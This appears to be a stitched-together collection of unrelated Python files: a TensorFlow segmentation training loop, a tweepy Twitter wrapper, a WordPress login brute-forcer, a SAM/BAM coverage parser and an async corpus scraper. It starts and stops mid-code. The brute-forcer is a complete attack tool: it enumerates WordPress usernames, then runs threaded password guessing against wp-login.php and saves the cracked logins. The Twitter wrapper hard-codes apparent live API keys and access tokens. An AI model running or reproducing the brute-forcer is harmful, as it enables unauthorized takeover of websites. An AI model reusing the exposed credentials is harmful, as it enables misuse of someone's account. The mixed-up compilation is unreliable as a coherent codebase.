loss2_d4=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss2_d5=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss2_d6=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss2 = tf.reduce_min([loss2_d1, loss2_d2, loss2_d3, loss2_d4, loss2_d5, loss2_d6]) + 0.0025*(32*loss2_d1+16*loss2_d2+8*loss2_d3+4*loss2_d4+2*loss2_d5+1*loss2_d6)
# IoU Loss
nw1 = tf.expand_dims(network[:,:,:,0],axis=3)
nw2 = tf.expand_dims(network[:,:,:,1],axis=3)
nw3 = tf.expand_dims(network[:,:,:,2],axis=3)
nw4 = tf.expand_dims(network[:,:,:,3],axis=3)
nw5 = tf.expand_dims(network[:,:,:,4],axis=3)
nw6 = tf.expand_dims(network[:,:,:,5],axis=3)
# Soft IoU: intersection approximated by product, union by elementwise max.
iou_d1 = 1-tf.reduce_mean(tf.multiply(nw1,output))/(tf.reduce_mean(tf.maximum(nw1,output))+1e-6)
iou_d2 = 1-tf.reduce_mean(tf.multiply(nw2,output))/(tf.reduce_mean(tf.maximum(nw2,output))+1e-6)
iou_d3 = 1-tf.reduce_mean(tf.multiply(nw3,output))/(tf.reduce_mean(tf.maximum(nw3,output))+1e-6)
iou_d4 = 1-tf.reduce_mean(tf.multiply(nw4,output))/(tf.reduce_mean(tf.maximum(nw4,output))+1e-6)
iou_d5 = 1-tf.reduce_mean(tf.multiply(nw5,output))/(tf.reduce_mean(tf.maximum(nw5,output))+1e-6)
iou_d6 = 1-tf.reduce_mean(tf.multiply(nw6,output))/(tf.reduce_mean(tf.maximum(nw6,output))+1e-6)
loss_iou = tf.reduce_min([iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6]) + 0.0025*(32*iou_d1+16*iou_d2+8*iou_d3+4*iou_d4+2*iou_d5+1*iou_d6)
# add positive/negative clicks as soft constraints
ct_mask = tf.cast(input[:,:,:,3],dtype=tf.bool) & tf.cast(input[:,:,:,4],dtype=tf.bool)
ct_mask = tf.tile(tf.expand_dims(~ct_mask,axis=3), [1,1,1,6])
ct_mask = tf.cast(ct_mask, dtype=tf.float32)
ct_mask /= tf.reduce_mean(ct_mask)  # normalize so the masked mean is comparable
output_tile = tf.tile(output,[1,1,1,6])
ct_loss = tf.reduce_mean(tf.abs(network - output_tile) * ct_mask)
all_loss = loss_iou + ct_loss
# Only optimize generator variables (scoped 'g_'); VGG weights stay frozen.
opt=tf.train.AdamOptimizer(learning_rate=0.0001).minimize(all_loss,var_list=[var for var in tf.trainable_variables() if var.name.startswith('g_')])
saver=tf.train.Saver(max_to_keep=1000)
# NOTE(review): tf.initialize_all_variables is deprecated in favor of
# tf.global_variables_initializer; left unchanged for this TF version.
sess.run(tf.initialize_all_variables())
ckpt=tf.train.get_checkpoint_state("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh")
if ckpt:
    print('loaded '+ckpt.model_checkpoint_path)
    saver.restore(sess,ckpt.model_checkpoint_path)
# Lazily-populated caches of training images and SBD instance masks.
input_images=[None]*len(train_im_names)
output_masks=[None]*len(train_im_names)
# For displaying the losses
# NOTE(review): `all` shadows the builtin; these arrays hold running per-step
# loss values, averaged over their nonzero entries when printed.
all=np.zeros(30000,dtype=float)
all2=np.zeros(30000,dtype=float)
all_iou=np.zeros(30000,dtype=float)
all_d1=np.zeros(30000,dtype=float)
all_d2=np.zeros(30000,dtype=float)
all_d3=np.zeros(30000,dtype=float)
all_d4=np.zeros(30000,dtype=float)
all_d5=np.zeros(30000,dtype=float)
all_d6=np.zeros(30000,dtype=float)
# ---- Training loop: one pass over the shuffled training set per epoch ----
for epoch in range(1,101):
    # Skip epochs whose result directory already exists (resume support).
    if os.path.isdir("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch):
        continue
    cnt=0
    for id in np.random.permutation(len(train_im_names)):
    # for id in np.random.permutation(1):
        if input_images[id] is None:
            # The input image
            input_images[id] = cv2.imread(im_path + "/" + train_im_names[id]+".jpg",-1)
        if output_masks[id] is None:
            # The SBD Groundtruth mask
            mat_contents = sio.loadmat(seg_path + "/" + train_im_names[id] + ".mat")
            tmpstr = mat_contents['GTinst']
            tmpmat = tmpstr[0,0]
            output_masks[id] = tmpmat['Segmentation']
        output_mask = deepcopy(output_masks[id])
        output_mask[output_mask==255] = 0  # 255 marks 'void' pixels in SBD
        num_obj = output_mask.max()
        # Train once per object instance in the image.
        for obj_id in range(num_obj):
            st = time.time()
            # random clicks
            input_pos = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_pos.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
            input_neg = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_neg.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
            input_pos_clks = deepcopy(input_pos)
            input_neg_clks = deepcopy(input_neg)
            input_pos_clks[input_pos != 0] = 255
            input_neg_clks[input_neg != 0] = 255
            if np.sum(input_pos==0)==0:
                continue
            # Stack RGB + click maps into the 7-channel network input.
            input_image=np.expand_dims(np.float32(np.concatenate(
                [input_images[id], np.expand_dims(input_pos,axis=2), np.expand_dims(input_neg,axis=2),
                 np.expand_dims(input_pos_clks,axis=2), np.expand_dims(input_neg_clks,axis=2)], axis=2)),axis=0)
            _,iH,iW,_=input_image.shape
            # Binary ground-truth mask for this object, scaled to [0,1].
            output_image = deepcopy(output_mask)
            output_image[output_mask != (obj_id+1)] = 0
            output_image[output_mask == (obj_id+1)] = 255
            output_image=np.expand_dims(np.expand_dims(np.float32(output_image),axis=0),axis=3)/255.0
            _,current,current2,current3,d1,d2,d3,d4,d5,d6=sess.run([opt,loss,loss2,loss_iou, iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6],feed_dict={input:input_image,sz:[iH,iW],output:output_image})
            all[cnt]=current*255.0*255.0 #squared in 255 range (remember the network takes [0,1]
            all2[cnt]=current2*255.0 #changed to 255 in error
            all_iou[cnt]=current3
            all_d1[cnt]=d1
            all_d2[cnt]=d2
            all_d3[cnt]=d3
            all_d4[cnt]=d4
            all_d5[cnt]=d5
            all_d6[cnt]=d6
            cnt+=1
            print("%d %d l2: %.4f l1: %.4f IoU: %.4f d1-6: %.4f %.4f %.4f %.4f %.4f %.4f time: %.4f %s"%(epoch,cnt,np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)]),np.mean(all_d1[np.where(all_d1)]),
                np.mean(all_d2[np.where(all_d2)]),np.mean(all_d3[np.where(all_d3)]),np.mean(all_d4[np.where(all_d4)]), np.mean(all_d5[np.where(all_d5)]), np.mean(all_d6[np.where(all_d6)]),
                time.time()-st,os.getcwd().split('/')[-2]))
    # ---- End-of-epoch: persist scores and checkpoints ----
    os.makedirs("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch)
    target=open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/score.txt"%epoch,'w')
    target.write("%f\n%f\n%f"%(np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)])))
    target.close()
    saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/model.ckpt")
    saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/model.ckpt"%epoch)
    # validation
    all_test = np.zeros(100, dtype=float)
    all2_test = np.zeros(100, dtype=float)
    all_iou_test = np.zeros(100, dtype=float)
    target = open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/test_score.txt" % epoch, 'w')
    for id in range(100):
        input_image = cv2.imread(im_path + "/" + val_im_names[id] + ".jpg", -1)
        # Fixed click set (1,1) and first object only, for reproducible eval.
        input_pos = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_pos.png" % (1, 1), -1)
        input_neg = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_neg.png" % (1, 1), -1)
        input_pos_clks = deepcopy(input_pos)
        input_neg_clks = deepcopy(input_neg)
        input_pos_clks[input_pos != 0] = 255
        input_neg_clks[input_neg != 0] = 255
        output_gt = cv2.imread("./val" + "/" + val_im_names[id] + "/objs/%05d.png" % 1, -1)
        output_gt = np.expand_dims(np.expand_dims(np.float32(output_gt), axis=0), axis=3) / 255.0
        iH, iW, _ = input_image.shape
        input_image = np.expand_dims(np.float32(np.concatenate(
            [input_image, np.expand_dims(input_pos, axis=2), np.expand_dims(input_neg, axis=2),
             np.expand_dims(input_pos_clks, axis=2), np.expand_dims(input_neg_clks, axis=2)], axis=2)), axis=0)
        st=time.time()
        output_image, loss_test, loss2_test, iou_test = sess.run([network, loss, loss2, loss_iou],feed_dict={input:input_image,sz:[iH,iW],output: output_gt})
        all_test[id] = loss_test * 255.0 * 255.0
        all2_test[id] = loss2_test * 255
        all_iou_test[id] = iou_test
        target.write("%f %f %f\n" % (all_test[id], all2_test[id], all_iou_test[id]))
        print("%.3f"%(time.time()-st))
        output_image = np.minimum(np.maximum(output_image, 0.0), 1.0)
        # Save each of the 6 output heads, both raw and overlaid on the image.
        for output_d in range(6):
            save_image = input_image[0, :, :, 0:3] / 255.0
            save_image[:, :, 0] = (save_image[:, :, 0] + 0.5 * output_image[0, :, :, output_d])
            save_image[:, :, 1] = (save_image[:, :, 1] + 0.5 * output_image[0, :, :, output_d])
            save_image[:, :, 2] = (save_image[:, :, 2] + 0.5 * output_image[0, :, :, output_d])
            save_image = np.minimum(np.maximum(save_image, 0.0), 1.0) * 255.0
            cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d_BW.png" % (epoch, val_im_names[id], output_d),
                        np.uint8(output_image[0, :, :, output_d] * 255.0))
            cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d.jpg" % (epoch, val_im_names[id], output_d),
                        np.uint8(save_image))
    target.write("Mean: %f %f %f\n" % (np.mean(all_test[np.where(all_test)]), np.mean(all2_test[np.where(all2_test)]), np.mean(all_iou_test[np.where(all_iou_test)])))
    target.close()
|
python
|
import tweepy
from tweepy.parsers import JSONParser
# This class creates an instance of the Twitter API
class API(object):
    """Thin wrapper around the tweepy Twitter client (JSON parser mode)."""

    def __init__(self):
        # SECURITY NOTE(review): API credentials are hard-coded here (the
        # original comment already suggests reading them from a file); they
        # should be moved to a config file or environment variables and the
        # keys below rotated, since they are exposed in source control.
        self.consumer_key = 'EfbgNEMgmXNSweNDcWmoaSwm0'
        self.consumer_secret = 'u3HlNeQNhG4whVzbilCxvswfJTMLG4ppxisaqtB4exHvGgDxsc'
        self.access_token_key = '3940337423-CC2NFNG4zX9t3Z4Hl5vAbseYmlhlz6CXbuDlQNr'
        self.access_token_secret = 'tmK2f3ZPrOWSkqY2bzu9St0LqDzJVIp5IV8PWPwENh69z'
        self.auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
        self.auth.set_access_token(self.access_token_key, self.access_token_secret)
        self.api = tweepy.API(self.auth, parser = JSONParser())

    def get_users(self, user_names):
        """Return the User entity for each screen name in user_names."""
        return [self.api.get_user(user) for user in user_names]

    def read_tweets(self, user_id):
        """Return all available tweets from user_id's timeline, newest first.

        Pages backwards through the timeline 200 tweets at a time until the
        API returns no older tweets.

        Bug fixes vs. the original:
        - the accumulator list was re-created on every loop pass, so only the
          *last* page of tweets was ever returned;
        - max_id is inclusive, so paging with max_id=oldest_id re-fetched the
          boundary tweet each page; max_id=oldest_id - 1 avoids duplicates.

        :raises tweepy.error.RateLimitError: re-raised with a message noting
            how many tweets were read before the limit was hit.
        """
        tweets = []        # All tweets accumulated so far.
        oldest_id = None   # Id of the oldest tweet read so far.
        while True:
            try:
                if oldest_id is None:
                    # First request: newest 200 tweets.
                    new_tweets = self.api.user_timeline(id = user_id, count = 200)
                else:
                    # Subsequent requests: 200 tweets strictly older than
                    # everything already read.
                    new_tweets = self.api.user_timeline(id = user_id, count = 200,
                                                        max_id = oldest_id - 1)
            except tweepy.error.RateLimitError:
                msg = "Rate limit reached after reading %d tweets." % (len(tweets))
                raise tweepy.error.RateLimitError(msg)
            if not new_tweets:
                break  # No older tweets left.
            tweets.extend(new_tweets)
            oldest_id = new_tweets[-1]['id']
        return tweets

    def rate_limit_status(self):
        """Return the request limit for the /account/settings resource."""
        return self.api.rate_limit_status()['resources']['account']['/account/settings']['limit']
|
python
|
# coding=utf-8
import threading, time, re, os, sys, json, random
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
'''
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
'''
class mulai(object):
    # Python 2 WordPress login brute-forcer. The entire workflow (prompting,
    # page scraping, username enumeration, threaded password guessing) runs
    # from __init__. NOTE(review): for security research / authorized testing
    # only, as the banner states.
    def __init__(self):
        self.flag = 0  # set to 1 by BruteForce when a valid password is found
        # ANSI color escape codes used for console output.
        self.r = '\033[31m'
        self.g = '\033[32m'
        self.y = '\033[33m'
        self.b = '\033[34m'
        self.m = '\033[35m'
        self.c = '\033[36m'
        self.w = '\033[37m'
        self.rr = '\033[39m'
        self.cls()
        self.print_logo()
        site = raw_input(self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' Target: ' + self.c)
        # Strip any scheme; requests below always prepend http://.
        if site.startswith('http://'):
            site = site.replace('http://', '')
        elif site.startswith('https://'):
            site = site.replace('https://', '')
        else:
            pass
        print self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' START BruteForce Process: ' \
            + self.c + site
        try:
            agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
            source = requests.get('http://' + site + '/wp-login.php', timeout=5, headers=agent).text.encode('utf-8')
            print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
                ' [Trying to Get Wp-login.php SourceCode] ' + self.g + ' [OK]'
            time.sleep(0.5)
        except:
            print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
                ' [ URL Not valid or Timeout! or Your Ip Address Blocked! ]'
            sys.exit()
        # Scrape the login form's submit-button value and redirect target.
        try:
            WpSubmitValue = re.findall('class="button button-primary button-large" value="(.*)"', source)[0]
            print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
                ' [Trying to Get WpSubmit Value From SourceCode] ' + self.g + ' [OK]'
            time.sleep(0.5)
        except:
            print self.c + ' [' + self.y + '-' + self.c + '] ' + self.w + \
                ' [Trying to Get WpSubmit Value From SourceCode] ' + self.r + ' [NO]'
            sys.exit()
        try:
            WpRedirctTo = re.findall('name="redirect_to" value="(.*)"', source)[0]
            print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
                ' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.g + ' [OK]'
            time.sleep(0.5)
        except:
            print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
                ' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.r + ' [NO]'
            sys.exit()
        # URL-encode the space in the submit button label.
        if 'Log In' in WpSubmitValue:
            WpSubmitValue = 'Log+In'
        else:
            WpSubmitValue = WpSubmitValue
        # Try automatic username enumeration first; fall back to a prompt.
        usgen = self.UserName_Enumeration(site)
        if usgen != None:
            Username = usgen
            time.sleep(1)
            print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
                ' Enumeration Username: ' + self.g + str(Username) + self.g + ' [OK]'
        else:
            try:
                Username = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w +
                                     ' Username for Start bf: ')
                if Username == '':
                    print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
                        ' [Username] ' + self.r + ' [NO]'
                    sys.exit()
            except:
                print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
                    ' [Username] ' + self.r + ' [NO]'
                sys.exit()
        try:
            password = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w + ' input Password list: ')
            with open(password, 'r') as xx:
                passfile = xx.read().splitlines()
            print self.c + ' [' + self.y + '+' + self.c + '] ' + self.g + \
                str(len(passfile)) + self.c + ' Passwords Loaded!'
            time.sleep(2)
        except:
            print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
                ' [Password list] ' + self.r + ' [NO]'
            sys.exit()
        # One thread per password attempt, throttled by the sleep below;
        # self.flag stops spawning new threads once a hit is found.
        thread = []
        for passwd in passfile:
            t = threading.Thread(target=self.BruteForce, args=(site, passwd, WpSubmitValue, WpRedirctTo, Username))
            if self.flag == 1:
                break
            else:
                t.start()
                thread.append(t)
                time.sleep(0.08)
        for j in thread:
            j.join()
        if self.flag == 0:
            print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
                + self.y + 'wordpress' + self.c + ' [Not Vuln]'
    def cls(self):
        # Clear the terminal ('cls' on Windows, 'clear' elsewhere).
        linux = 'clear'
        windows = 'cls'
        os.system([linux, windows][os.name == 'nt'])
    def print_logo(self):
        # Print the colored banner line by line (requires figlet/lolcat).
        clear = "\x1b[0m"
        colors = [36, 32, 34, 35, 31, 37]
        os.system("figlet wp-brute | lolcat")
        x = """
     r00t@star
     Sunda Cyber Army github.com/bintangAlif5
     Note! : We don't Accept any responsibility for any illegal usage.
     example : http://site
        """
        for N, line in enumerate(x.split("\n")):
            sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
            time.sleep(0.05)
    def UserName_Enumeration(self, site):
        # Try the wp-json users endpoint first, then the ?author=1 redirect.
        # Returns the discovered username, or None.
        _cun = 1
        Flag = True
        __Check2 = requests.get('http://' + site + '/?author=1', timeout=10)
        try:
            while Flag:
                GG = requests.get('http://' + site + '/wp-json/wp/v2/users/' + str(_cun), timeout=5)
                __InFo = json.loads(GG.text)
                if 'id' not in __InFo:
                    Flag = False
                else:
                    Usernamez = __InFo['slug']
                    return str(Usernamez).encode('utf-8')
                    break
        except:
            # wp-json failed; fall back to scraping /author/<name>/ links.
            try:
                if '/author/' not in __Check2.text:
                    return None
                else:
                    find = re.findall('/author/(.*)/"', __Check2.text)
                    username = find[0]
                    if '/feed' in username:
                        find = re.findall('/author/(.*)/feed/"', __Check2.text)
                        username2 = find[0]
                        return username2.encode('utf-8')
                    else:
                        return username.encode('utf-8')
            except requests.exceptions.ReadTimeout:
                return None
    def BruteForce(self, site, passwd, WpSubmitValue, WpRedirctTo, Username):
        # Post one login attempt; a 'wordpress_logged_in_' cookie means success.
        agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
        post = {}
        post['log'] = Username
        post['pwd'] = passwd
        post['wp-submit'] = WpSubmitValue
        post['redirect_to'] = WpRedirctTo
        post['testcookie'] = 1
        url = "http://" + site + '/wp-login.php'
        GoT = requests.post(url, data=post, headers=agent, timeout=10)
        print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
            ' Testing: ' + self.y + passwd
        if 'wordpress_logged_in_' in str(GoT.cookies):
            print self.c + ' [' + self.y + '+' + self.c + '] ' + \
                self.y + site + ' ' + self.y + 'username: ' + self.g \
                + Username + self.y + ' Password: ' + self.g + passwd
            # NOTE(review): the file below hard-codes 'Username: admin' even
            # though the actual username may differ (see Username above).
            with open('HackedWordpress.txt', 'a') as writer:
                writer.write('http://' + site + '/wp-login.php' + '\n Username: admin' + '\n Password: ' +
                             passwd + '\n-----------------------------------------\n')
            self.flag = 1
# Script entry point: constructing the class runs the whole tool.
mulai()
|
python
|
"""
methods for processing mapping results in SAM/BAM format
def parse_deltas(sam_file, ...):
parse a sam/bam file into dicts of coverage changes by position
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
convert coverage deltas into coverage array
class SAMFlag(IntFlag):
class for decomposing SAM flags into bits for easier understanding
"""
import numpy
import subprocess
import enum
from collections import defaultdict
from edl import blastm8
import logging
# samtools filter: -F 2308 excludes reads flagged unmapped (4), secondary
# (256), or supplementary (2048), keeping only primary mapped alignments.
SAMTOOLS_CMD_TEMPLATE = """samtools view -F 2308 {sam_file}"""
def parse_deltas_from_sam(sam_file, samtools_cmd_template=SAMTOOLS_CMD_TEMPLATE, **kwargs):
    """
    Parse a SAM file into a collection of coverage deltas by reference sequences
    by default it uses samtools to strip all but the primary alignments first
    then hits are parsed with any kwargs sent to blastm8.FilterParams()
    """
    samtools_cmd = samtools_cmd_template.format(sam_file=sam_file)
    with subprocess.Popen(samtools_cmd, shell=True, stdout=subprocess.PIPE,) as process:
        # samtools emits bytes; decode each line to str for the parser.
        string_lines = (l.decode() for l in iter(process.stdout))
        return parse_deltas(string_lines, format=blastm8.SAM, **kwargs)
def parse_deltas(hit_table, portion=False, zero_indexed=False, **kwargs):
    """ parses hit table into coverage deltas.
    kwargs passed blastm8.generate_hits()

    Returns {reference_name: {position: coverage_change}}; each hit adds
    +factor at its start and -factor just past its (inclusive) end, so a
    running sum over positions reconstructs coverage (see deltas_to_cov).
    If portion is True, a read's weight is split evenly among its hits.
    """
    # dict of dicts of counts
    deltas_by_ref = defaultdict(lambda: defaultdict(int))
    read_count, hit_count = 0, 0
    for read, hits in blastm8.generate_hits(
        hit_table, **kwargs
    ):
        read_count += 1
        factor = 1 / len(hits) if portion else 1
        for hit in hits:
            hit_count += 1
            # hstart/hend may be reversed for minus-strand hits; normalize.
            start, end = sorted((hit.hstart, hit.hend))
            if zero_indexed:
                # Shift 0-indexed hit coordinates to the 1-indexed positions
                # the deltas use.
                start, end = start+1, end+1
            deltas = deltas_by_ref[hit.hit]
            deltas[start] += factor
            deltas[end + 1] -= factor
    logging.debug(
        "parsed deltas for %d contigs from %d reads and %d hits",
        len(deltas_by_ref),
        read_count,
        hit_count,
    )
    return deltas_by_ref
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
    """ converts dict of coverage deltas into array of coverage values

    cov_deltas: {pos: cov_change, ...} with 1-indexed positions
    x_max: length of reference sequence (otherwise use last delta position)
    nan_for_zero: replace 0 coverage with NaN so plots are discontinuous

    Returns a numpy array of per-position coverage built by accumulating
    the deltas in position order.

    Fix: numpy.NAN -> numpy.nan; the upper-case alias was removed in
    NumPy 2.0, while numpy.nan is the canonical spelling on all versions.
    """
    zero = numpy.nan if nan_for_zero else 0
    sorted_keys = sorted(cov_deltas)
    cov_segments = []
    last_pos = 1
    current_coverage = 0
    for pos in sorted_keys:
        delta = cov_deltas[pos]
        # Emit the constant-coverage stretch ending just before this delta.
        cov_segments.append(
            numpy.full(
                pos - last_pos, current_coverage if current_coverage != 0 else zero
            )
        )
        current_coverage += delta
        last_pos = pos
    # Tail segment: out to x_max if given, else a single trailing position.
    cov_segments.append(
        numpy.full(
            1 if x_max is None else x_max + 1 - last_pos,
            current_coverage if current_coverage != 0 else zero,
        )
    )
    return numpy.concatenate(cov_segments)
class SAMFlag(enum.IntFlag):
    """
    From Wikipedia SAM Format entry:
    (int)   (binary)       (meaning)
    1	    000000000001	template having multiple templates in sequencing (read is paired)
    2	    000000000010	each segment properly aligned according to the aligner (read mapped in proper pair)
    4	    000000000100	segment unmapped (read1 unmapped)
    8	    000000001000	next segment in the template unmapped (read2 unmapped)
    16	    000000010000	SEQ being reverse complemented (read1 reverse complemented)
    32	    000000100000	SEQ of the next segment in the template being reverse complemented (read2 reverse complemented)
    64	    000001000000	the first segment in the template (is read1)
    128	    000010000000	the last segment in the template (is read2)
    256	    000100000000	not primary alignment
    512	    001000000000	alignment fails quality checks
    1024	010000000000	PCR or optical duplicate
    2048	100000000000	supplementary alignment (e.g. aligner specific, could be a portion of a split read or a tied region)
    """
    # Member values mirror the SAM spec bit flags tabulated above; IntFlag
    # lets callers combine and test them with bitwise operators.
    PAIRED = 1
    PROPER_PAIR = 2
    UNMAPPED = 4
    NEXT_UNMAPPED = 8
    REV_COMP = 16
    NEXT_REV_COMP = 32
    READ_1 = 64
    READ_2 = 128
    NON_PRIMARY = 256
    LOW_Q = 512
    DUPLICATE = 1024
    SUPPLEMENTAL = 2048
|
python
|
"""
Module for requesting a URL and getting the page's HTML code from there,
downloading media files, and checking that the request is correct and the page exists in the RNC.
"""
__all__ = (
'get_htmls', 'is_request_correct', 'download_docs'
)
import asyncio
import logging
import time
from typing import List, Optional, Tuple, Union
import aiofiles
import aiohttp
import bs4
logger = logging.getLogger("rnc")
# Seconds to sleep after an HTTP 429 before retrying; also used as the
# aiohttp client timeout in get_htmls_coro.
WAIT = 24
class BaseRequestError(Exception):
    # Root of this module's exception hierarchy.
    pass
class NoResultFound(BaseRequestError):
    # The corpus returned a page with no search results.
    pass
class LastPageDoesntExist(BaseRequestError):
    # A page index beyond the last available page was requested.
    pass
class WrongHTTPRequest(BaseRequestError):
    # The HTTP request itself was malformed or rejected.
    pass
async def fetch_html(url: str,  # type: ignore
                     ses: aiohttp.ClientSession,
                     **kwargs) -> Optional[Union[Tuple[int, str], int]]:
    """ Coro, obtaining page's HTML code.

    This coro should be awaited from a worker.

    :return: tuple of int and str, page index and its HTML code.
     None if there's an error, -1 if it's 429 and the worker should
     wait some time and make request again.
    :exception: all exceptions should be processed here.
    """
    # kwargs are forwarded as URL query params; 'p' (page index) must be
    # among them -- it is echoed back in the success return value.
    worker_name = kwargs.pop('worker_name', '')
    try:
        resp = await ses.get(url, params=kwargs)
    except Exception as e:
        logger.error(
            f"{e}\n{worker_name}Cannot get "
            f"answer from '{url}' with {kwargs}")
        return  # type: ignore
    if resp.status == 200:
        text = await resp.text('utf-8')
        resp.close()
        return kwargs['p'], text
    elif resp.status == 429:
        # Rate limited: signal the worker to back off and retry.
        resp.close()
        return -1
    # Any other status: log it and fall through, returning None implicitly.
    logger.error(
        f"{worker_name}{resp.status} -- '{resp.reason}' "
        f"requesting to {resp.url}"
    )
    resp.close()
async def worker_fetching_html(worker_name: str,
                               q_args: asyncio.Queue,
                               q_results: asyncio.Queue) -> None:
    """
    Worker requesting to URL with args from
    q_args and putting results to q_results.

    Wait some time and request again if there's 429 error.
    """
    while True:
        # NOTE(review): get_nowait raises asyncio.QueueEmpty once the queue
        # drains; the worker task then dies with that exception unless it is
        # cancelled first by the coordinator (see get_htmls_coro).
        url, ses, kwargs = q_args.get_nowait()
        logger.debug(
            f"{worker_name}Requested to '{url}' with '{kwargs}'")
        res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
        if res is None:
            # Unrecoverable error for this page: mark done and stop worker.
            q_args.task_done()
            return
        while res == -1:
            # 429: back off WAIT seconds, then retry the same page.
            logger.debug(
                f"{worker_name}429 'Too many requests', "
                f"page: {kwargs['p']}; wait {WAIT}s"
            )
            await asyncio.sleep(WAIT)
            res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
        logger.debug(
            f"{worker_name}Received from '{url}' with '{kwargs}'")
        q_args.task_done()
        await q_results.put((res[0], res[1]))  # type: ignore
async def get_htmls_coro(url: str,
                         start: int,
                         stop: int,
                         **kwargs) -> List[str]:
    """
    Coro running 5 workers doing requests and
    getting HTML codes of the pages.

    URLs will be created for i in range(start, stop),
    HTTP tag 'p' (page) is i.
    """
    timeout = aiohttp.ClientTimeout(WAIT)
    q_results = asyncio.Queue(maxsize=-1)  # type: ignore
    q_args = asyncio.Queue(maxsize=-1)  # type: ignore
    async with aiohttp.ClientSession(timeout=timeout) as ses:
        # Enqueue one request spec per page index.
        for p_index in range(start, stop):
            await q_args.put((url, ses, {**kwargs, 'p': p_index}))
        tasks = []
        for worker_index in range(5):
            name = f"Worker-{worker_index + 1}: "
            task = asyncio.create_task(
                worker_fetching_html(name, q_args, q_results)
            )
            tasks += [task]
        # Wait until every queued page has been processed, then stop workers.
        await q_args.join()
        for task in tasks:
            task.cancel()
    results = [
        q_results.get_nowait()
        for _ in range(q_results.qsize())
    ]
    # Restore page order (workers may finish out of order), drop the indices.
    results.sort(key=lambda res: res[0])
    return [
        html for _, html in results
    ]
def get_htmls(url: str,
              start: int = 0,
              stop: int = 1,
              **kwargs) -> List[str]:
    """ Run coro, get html codes of the pages."""
    logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
    began_at = time.time()
    # drive the async pipeline from synchronous code
    pages = asyncio.run(get_htmls_coro(url, start, stop, **kwargs))
    logger.info("Request was successfully completed")
    logger.info(f"Coro executing time: {round(time.time() - began_at, 2)}")
    return pages
async def get_htmls_async(url: str,
                          start: int = 0,
                          stop: int = 1,
                          **kwargs) -> List[str]:
    """ Run coro, get html codes of the pages."""
    logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
    began_at = time.time()
    # same as get_htmls, but awaitable from an existing event loop
    pages = await get_htmls_coro(url, start, stop, **kwargs)
    logger.info("Request was successfully completed")
    logger.info(f"Coro executing time: {round(time.time() - began_at, 2)}")
    return pages
def whether_result_found(url: str,
                         **kwargs) -> str:
    """
    Whether the page contains results.

    :return: first page HTML code if everything is OK.
    :exception RuntimeError: if HTTP request was wrong.
    :exception ValueError: if the result not found.
    """
    logger.debug("Validating that the request is OK")
    try:
        page_html = get_htmls(url, **kwargs)[0]
    except Exception as e:
        logger.error(f"The request is not correct: {kwargs}")
        # chain the original exception so the real cause is not lost
        raise RuntimeError from e
    logger.debug("The request is correct")

    logger.debug("Validating that the result exits")
    soup = bs4.BeautifulSoup(page_html, 'lxml')
    # TODO: narrow the search scope
